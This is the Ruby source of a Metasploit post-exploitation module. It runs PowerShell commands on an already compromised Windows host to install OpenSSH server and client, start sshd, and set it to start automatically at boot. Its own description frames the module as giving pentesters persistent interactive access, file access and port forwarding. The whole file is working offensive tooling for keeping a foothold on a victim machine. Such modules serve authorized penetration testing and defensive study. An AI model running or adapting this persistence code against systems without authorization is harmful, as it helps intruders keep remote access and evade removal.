##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Post::Windows::Powershell

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Install OpenSSH for Windows',
        'Description' => %q{
          This module installs OpenSSH server and client for Windows using PowerShell.
          SSH on Windows can provide pentesters persistent access to a secure interactive terminal, interactive filesystem access, and port forwarding over SSH.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Michael Long <bluesentinel[at]protonmail.com>'],
        'Arch' => [ARCH_X86, ARCH_X64],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter', 'shell' ],
        'References'	=> [
          ['URL', 'https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_overview'],
          ['URL', 'https://github.com/PowerShell/openssh-portable']
        ]
      )
    )
    register_options(
      [
        OptBool.new('INSTALL_SERVER', [true, 'Install OpenSSH.Server for Windows', true]),
        OptBool.new('INSTALL_CLIENT', [true, 'Install OpenSSH.Client for Windows', true]),
        OptBool.new('UNINSTALL_SERVER', [true, 'Uninstall OpenSSH.Server for Windows', false]),
        OptBool.new('UNINSTALL_CLIENT', [true, 'Uninstall OpenSSH.Client for Windows', false]),
        OptString.new('SERVER_VER', [true, 'OpenSSH.Server version', 'OpenSSH.Server~~~~0.0.1.0']),
        OptString.new('CLIENT_VER', [true, 'OpenSSH.Client version', 'OpenSSH.Client~~~~0.0.1.0']),
        OptBool.new('AUTOSTART', [true, 'Sets sshd service to startup automatically at system boot for persistence', true])
      ]
    )
  end

  def run
    # check admin privileges
    unless is_system? || is_admin?
      fail_with(Failure::NotVulnerable, 'Insufficient privileges to install or remove OpenSSH')
    end

    # check if PowerShell is available
    psh_path = '\\WindowsPowerShell\\v1.0\\powershell.exe'
    if !file? "%WINDIR%\\System32#{psh_path}"
      fail_with(Failure::NotVulnerable, 'No powershell available.')
    end

    # uninstall OpenSSH.Server
    if datastore['UNINSTALL_SERVER']
      print_status('Uninstalling OpenSSH.Server')
      uninstall_ssh_server
    end

    # unintall OpenSSH.Client
    if datastore['UNINSTALL_CLIENT']
      print_status('Uninstalling OpenSSH.Client')
      uninstall_ssh_client
    end

    # install OpenSSH.Server
    if datastore['INSTALL_SERVER']
      print_status('Installing OpenSSH.Server')
      install_ssh_server
    end

    # install OpenSSH.Client
    if datastore['INSTALL_CLIENT']
      print_status('Installing OpenSSH.Client')
      install_ssh_client
    end
  end

  def install_ssh_server
    script = "Add-WindowsCapability -Online -Name #{datastore['SERVER_VER']}; "
    script << 'Start-Service sshd; '
    if datastore['AUTOSTART']
      script << "Set-Service -Name sshd -StartupType 'Automatic'"
    end
    psh_exec(script)
  end

  def install_ssh_client
    script = "Add-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}; "
    psh_exec(script)
  end

  def uninstall_ssh_server
    script = 'Stop-Service sshd; '
    script << "Remove-WindowsCapability -Online -Name #{datastore['SERVER_VER']}"
    psh_exec(script)
  end

  def uninstall_ssh_client
    script = "Remove-WindowsCapability -Online -Name #{datastore['CLIENT_VER']}"
    psh_exec(script)
  end
end